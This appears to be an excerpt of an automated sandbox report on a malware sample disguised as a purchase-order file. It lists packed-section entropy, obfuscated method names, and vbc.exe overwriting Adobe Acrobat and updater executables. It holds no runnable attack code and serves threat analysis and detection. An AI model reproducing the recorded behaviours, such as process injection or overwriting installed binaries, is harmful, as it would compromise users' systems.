                  Source: updater.exe.9.drStatic PE information: section name: .voltbl
                  Source: updater.exe.9.drStatic PE information: section name: _RDATA
                  Source: armsvc.exe.9.drStatic PE information: section name: .didat
                  Source: alg.exe.9.drStatic PE information: section name: .didat
                  Source: FXSSVC.exe.9.drStatic PE information: section name: .didat
                  Source: elevation_service.exe.9.drStatic PE information: section name: .00cfg
                  Source: elevation_service.exe.9.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe.9.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe.9.drStatic PE information: section name: _RDATA
                  Source: elevation_service.exe.9.drStatic PE information: section name: malloc_h
                  Source: elevation_service.exe0.9.drStatic PE information: section name: .00cfg
                  Source: elevation_service.exe0.9.drStatic PE information: section name: .gxfg
                  Source: elevation_service.exe0.9.drStatic PE information: section name: .retplne
                  Source: elevation_service.exe0.9.drStatic PE information: section name: _RDATA
                  Source: elevation_service.exe0.9.drStatic PE information: section name: malloc_h
                  Source: maintenanceservice.exe.9.drStatic PE information: section name: .00cfg
                  Source: maintenanceservice.exe.9.drStatic PE information: section name: .voltbl
                  Source: maintenanceservice.exe.9.drStatic PE information: section name: _RDATA
                  Source: msdtc.exe.9.drStatic PE information: section name: .didat
                  Source: GoogleCrashHandler64.exe.9.drStatic PE information: section name: _RDATA
                  Source: GoogleCrashHandler64.exe.9.drStatic PE information: section name: .gxfg
                  Source: GoogleCrashHandler64.exe.9.drStatic PE information: section name: .gehcont
                  Source: GoogleUpdateComRegisterShell64.exe.9.drStatic PE information: section name: _RDATA
                  Source: GoogleUpdateComRegisterShell64.exe.9.drStatic PE information: section name: .gxfg
                  Source: GoogleUpdateComRegisterShell64.exe.9.drStatic PE information: section name: .gehcont
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: section name: .00cfg
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: section name: .retplne
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: section name: .00cfg
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: section name: .retplne
                  Source: msiexec.exe.9.drStatic PE information: section name: .didat
                  Source: MsSense.exe.9.drStatic PE information: section name: .didat
                  Source: Spectrum.exe.9.drStatic PE information: section name: .didat
                  Source: TieringEngineService.exe.9.drStatic PE information: section name: .didat
                  Source: vds.exe.9.drStatic PE information: section name: .didat
                  Source: VSSVC.exe.9.drStatic PE information: section name: .didat
                  Source: WmiApSrv.exe.9.drStatic PE information: section name: .didat
                  Source: wmpnetwk.exe.9.drStatic PE information: section name: .didat
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004AB81E push es; ret 9_2_004AB820
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004A7371 push es; ret 9_2_004A737D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004A6DDD pushad ; ret 9_2_004A6DE9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004A53E6 push ecx; ret 9_2_004A53F1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004ABBBF push esi; ret 9_2_004ABBC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0044B0B0 push es; ret 9_2_0044B0B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0044E11C push esi; iretd 9_2_0044E17C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0044A9EB push eax; ret 9_2_0044AA27
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0044BDFF pushad ; ret 9_2_0044BE0A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0044F584 push esi; ret 9_2_0044F592
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00449A40 push A3221A04h; ret 9_2_00449A45
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0044E67F push es; ret 9_2_0044E685
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0044B2E5 push esp; iretd 9_2_0044B2E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0044E703 push 8303313Dh; ret 9_2_0044E708
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004679CF push es; mov dword ptr [esp], eax9_2_00467A56
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00462FCB push eax; iretd 9_2_00462FCD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004646A1 push es; ret 9_2_004646A4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0044386C push 1000939Fh; ret 9_2_00443884
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00423149 push eax; ret 9_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0041C40C push cs; iretd 9_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0041C50E push cs; iretd 9_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_004231C8 push eax; ret 9_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_0041C6BE push ebx; ret 9_2_0041C6BF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F4B180 push 00F4B0CAh; ret 9_2_00F4B061
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F4B180 push 00F4B30Dh; ret 9_2_00F4B1E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F4B180 push 00F4B2F2h; ret 9_2_00F4B262
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F4B180 push 00F4B255h; ret 9_2_00F4B2ED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F4B180 push 00F4B2D0h; ret 9_2_00F4B346
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F4B180 push 00F4B37Fh; ret 9_2_00F4B3B7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F4A915 push 00F48933h; ret 9_2_00F48930
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 9_2_00F4A915 push 00F48D6Dh; ret 9_2_00F48DFE
                  Source: RFQ_PO N89397-GM7287-Order.bat.exeStatic PE information: section name: .text entropy: 7.887666262860419
                  Source: YRtQgzFlDnVSru.exe.0.drStatic PE information: section name: .text entropy: 7.887666262860419
                  Source: Aut2exe.exe.9.drStatic PE information: section name: .rsrc entropy: 7.800655830974613
                  Source: Aut2exe_x64.exe.9.drStatic PE information: section name: .rsrc entropy: 7.800504507977463
                  Source: AppVClient.exe.9.drStatic PE information: section name: .reloc entropy: 7.9365361070490295
                  Source: AutoIt3_x64.exe.9.drStatic PE information: section name: .reloc entropy: 7.943953658764053
                  Source: SciTE.exe.9.drStatic PE information: section name: .reloc entropy: 7.912336457307507
                  Source: jucheck.exe.9.drStatic PE information: section name: .reloc entropy: 7.931094323205373
                  Source: jusched.exe.9.drStatic PE information: section name: .reloc entropy: 7.936067113605391
                  Source: FXSSVC.exe.9.drStatic PE information: section name: .reloc entropy: 7.942287638561988
                  Source: elevation_service.exe.9.drStatic PE information: section name: .reloc entropy: 7.943956705190361
                  Source: elevation_service.exe0.9.drStatic PE information: section name: .reloc entropy: 7.9459835225835755
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe.9.drStatic PE information: section name: .reloc entropy: 7.934784500246349
                  Source: 117.0.5938.134_117.0.5938.132_chrome_updater.exe0.9.drStatic PE information: section name: .reloc entropy: 7.93478291358013
                  Source: SensorDataService.exe.9.drStatic PE information: section name: .reloc entropy: 7.935395435122308
                  Source: Spectrum.exe.9.drStatic PE information: section name: .reloc entropy: 7.9454653789250385
                  Source: AgentService.exe.9.drStatic PE information: section name: .reloc entropy: 7.937144343259236
                  Source: vds.exe.9.drStatic PE information: section name: .reloc entropy: 7.9410811809386175
                  Source: VSSVC.exe.9.drStatic PE information: section name: .reloc entropy: 7.939554200415346
                  Source: wbengine.exe.9.drStatic PE information: section name: .reloc entropy: 7.941302126952605
                  Source: wmpnetwk.exe.9.drStatic PE information: section name: .reloc entropy: 7.946626206660949
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.81e0000.4.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, FZaOUuOPvnEAfIAr0M.csHigh entropy of concatenated method names: 'lEA0fIAr0', 'tZCA8AZk9', 'gXO9bmMm8', 'DGw7NTeNK', 'Om2dkTqQy', 'EZYgaiyMO', 'Dispose', 'FZaOOUuPv', 'pv8tyvFJFxYXZkDera', 'y16QeXgcC0F7yngarN'
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, GtaAIbrHXObmMm8GPA.csHigh entropy of concatenated method names: 't43wlqHDE', 'b331V9lSR', 'y0lQR8D9G', 'PPrmXmJxA', 'CF9acgM2i', 'eykiYV7wh', 'vSMVwpZMk', 'kxKJsuLoh', 'Ny8e5Nb61', 'qdOCMMDun'
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.4a424e8.1.raw.unpack, kAOj1Y7pfP90kycNNw.csHigh entropy of concatenated method names: 'lb2Ia3XrDtd392xi2Tb', 'XJIblTXQXnFqByJBCJm', 'uLEr9lUTy0', 'Y8R45UX8CExDEFrtuqs', 'ye0NJSX7mZWAZIVVpiG', 'WY1PxJXMKygj5Preg16', 'ELG2kXXJWTZduCJNQBl', 'RgtTUJcyZL', 'wUUrNltvEH', 'CJErdEKrT9'

                  Persistence and Installation Behavior

                  barindex
                  Creates files in the system32 config directory
                  Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\f1a1dcf99c90d829.bin
                  Drops executable to a common third party application directory
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
